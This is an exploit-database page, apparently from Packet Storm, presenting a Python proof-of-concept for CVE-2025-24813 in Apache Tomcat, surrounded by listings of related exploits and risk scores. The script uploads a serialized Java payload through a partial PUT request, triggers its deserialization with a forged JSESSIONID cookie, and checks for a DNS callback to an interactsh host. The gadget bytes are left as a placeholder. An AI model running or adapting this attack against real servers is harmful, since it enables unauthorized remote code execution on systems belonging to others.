📄 Apache Tomcat Remote Code Execution

🗓️ 07 Apr 2025 00:00:00Reported by Al Baradi JoyType

packetstorm🔗 packetstorm.news👁 309 Views

Exploit for Apache Tomcat Remote Code Execution via Path Equivalence, CVE-2025-24813.

Reporter	Title	Published	Views	Family All 324
GithubExploit	Exploit for Deserialization of Untrusted Data in Apache Tomcat	3 Jul 202500:31	–	githubexploit
GithubExploit	Exploit for Deserialization of Untrusted Data in Apache Tomcat	14 Mar 202507:36	–	githubexploit
GithubExploit	Exploit for Deserialization of Untrusted Data in Apache Tomcat	14 Mar 202503:11	–	githubexploit
GithubExploit	Exploit for CVE-2025-55752	29 Oct 202508:27	–	githubexploit
GithubExploit	Exploit for Deserialization of Untrusted Data in Apache Tomcat	11 May 202519:50	–	githubexploit
GithubExploit	Exploit for Deserialization of Untrusted Data in Apache Tomcat	22 Mar 202515:16	–	githubexploit
GithubExploit	Exploit for Deserialization of Untrusted Data in Apache Tomcat	12 Jul 202502:40	–	githubexploit
GithubExploit	Exploit for Deserialization of Untrusted Data in Apache Tomcat	27 Apr 202513:50	–	githubexploit
GithubExploit	Exploit for CVE-2025-2783	26 May 202512:51	–	githubexploit
GithubExploit	Exploit for Deserialization of Untrusted Data in Apache Tomcat	10 Dec 202509:53	–	githubexploit

# Exploit Title: Apache Tomcat Path Equivalence - Remote Code Execution
    # Exploit Author: Al Baradi Joy
    # CVE: CVE-2025-24813
    # Date: 2025-04-06
    # Vendor Homepage: https://tomcat.apache.org/
    # Software Link: https://tomcat.apache.org/download-90.cgi
    # Version: Apache Tomcat < 11.0.3 / 10.1.35 / 9.0.98
    # Tested on: Apache Tomcat 10.1.33
    # CVSS: 9.8 (CRITICAL)
    # CWE: CWE-44, CWE-502
    # Reference:
    https://scrapco.de/blog/analysis-of-cve-2025-24813-apache-tomcat-path-equivalence-rce.html
    
    import requests
    import random
    import string
    import sys
    
    def rand_filename(length=6):
        return ''.join(random.choices(string.ascii_lowercase, k=length))
    
    def generate_payload(interact_url):
        # Java serialized payload gadget triggering DNS interaction
        return f'\xac\xed\x00\x05...'  # Replace with actual gadget bytes or
    generator
    
    def exploit(target, interact_url):
        filename = rand_filename()
        put_url = f"{target}/{filename}.session"
        get_url = f"{target}/{filename}"
        headers = {
            "Content-Range": "bytes 0-452/457",
            "Content-Type": "application/octet-stream"
        }
        payload = generate_payload(interact_url)
    
        print("[+] Exploit for CVE-2025-24813")
        print("[+] Made By Al Baradi Joy\n")
        print(f"[+] Uploading payload to: {put_url}")
        r1 = requests.put(put_url, data=payload, headers=headers)
        if r1.status_code == 201:
            print("[+] Payload uploaded successfully.")
        else:
            print(f"[-] Upload failed with status: {r1.status_code}")
            return
    
        print(f"[+] Triggering payload via: {get_url}")
        cookies = {"JSESSIONID": f".{filename}"}
        r2 = requests.get(get_url, cookies=cookies)
        print(f"[+] Trigger request sent. Check for DNS callback to:
    {interact_url}")
    
    if __name__ == "__main__":
        # Display banner first
        print("[+] Exploit for CVE-2025-24813")
        print("[+] Made By Al Baradi Joy\n")
    
        # Ask the user for the target domain and interact URL
        target_url = input("Enter the target domain (e.g., http://localhost:8080):
    ")
        interact_url = input("Enter your interactsh URL: ")
    
        exploit(target_url, interact_url)

07 Apr 2025 00:00Current

9.5High risk

Vulners AI Score9.5

CVSS 3.19.8

EPSS0.9413